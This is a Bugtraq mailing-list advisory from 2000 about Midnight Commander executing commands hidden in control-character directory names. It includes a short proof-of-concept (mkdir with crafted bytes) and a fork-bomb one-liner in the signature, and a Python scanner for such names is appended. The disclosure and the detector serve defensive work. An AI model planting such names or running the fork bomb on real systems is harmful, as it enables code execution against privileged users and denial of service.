Bugtraq mailing list archives
Midnight Commander
From: Michal Zalewski <lcamtuf () TPI PL>
Date: Tue, 28 Nov 2000 01:15:51 +0100
The Midnight Commander 4.5.51 (latest).

  $ od -t x1 mcbug
  0000000 03 14 77 04 0a
  $ mkdir `cat mcbug`
  $ mc

(try to view this directory - 'w' - 0x77 command will be executed; longer commands might be used, as well)

Obviously, this attack requires privileged user interaction. Midnight Commander won't display the full name of the directory if it's long enough, so these control characters can be easily hidden.

Such problems in Midnight Commander seem to appear more or less frequently. I am afraid this pretty useful file manager should not be used in multiuser systems, especially by root (I can recall numerous problems with this utility in recent years - code execution when viewing specific file types, code execution via mc vfs support, etc etc) :(

Workaround: well, I am afraid only code audit might help :(

--
_______________________________________________________
Michal Zalewski [lcamtuf () tpi pl] [tp.internet/security]
[http://lcamtuf.na.export.pl] <=--=> bash$ :(){ :|:&};:
=--=> Did you know that clones never use mirrors? <=--=
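
A defender-side check for the situation described in the post, as an added example that is not part of the original message: it walks a tree using raw byte paths and reports entries whose names contain control bytes, rendering them escaped so they are safe to display. The function names are assumptions made for illustration, and the sample tree is constructed, reusing the directory-name bytes shown in the post's `od` output.

```python
import os
import tempfile


def has_control_bytes(name: bytes) -> bool:
    """True if a raw file name contains C0 control bytes or DEL."""
    return any(b < 0x20 or b == 0x7F for b in name)


def escape_name(name: bytes) -> str:
    """Render a raw name with non-printable bytes (and backslash) as \\xNN."""
    return "".join(
        chr(b) if 0x20 <= b < 0x7F and b != 0x5C else f"\\x{b:02x}"
        for b in name
    )


def find_suspicious(root: str) -> list[tuple[str, str]]:
    """Walk root with bytes paths; return (escaped parent, escaped name) pairs."""
    hits = []
    for parent, dirs, files in os.walk(os.fsencode(root)):
        for name in dirs + files:
            if has_control_bytes(name):
                hits.append((escape_name(parent), escape_name(name)))
    return sorted(hits)


def demo() -> list[str]:
    """Build a constructed tree with one benign and one flagged directory."""
    with tempfile.TemporaryDirectory() as root:
        os.mkdir(os.path.join(root, "reports"))
        # Constructed sample: the bytes from the post's od output, without
        # the trailing 0x0a that the backtick substitution strips.
        os.mkdir(os.path.join(os.fsencode(root), b"\x03\x14w\x04"))
        return [name for _, name in find_suspicious(root)]


if __name__ == "__main__":
    for flagged in demo():
        print("control characters in name:", flagged)
```

Run against a shared directory such as a home or spool tree, `find_suspicious` gives an escaped listing that can be reviewed without a terminal or file manager interpreting the bytes.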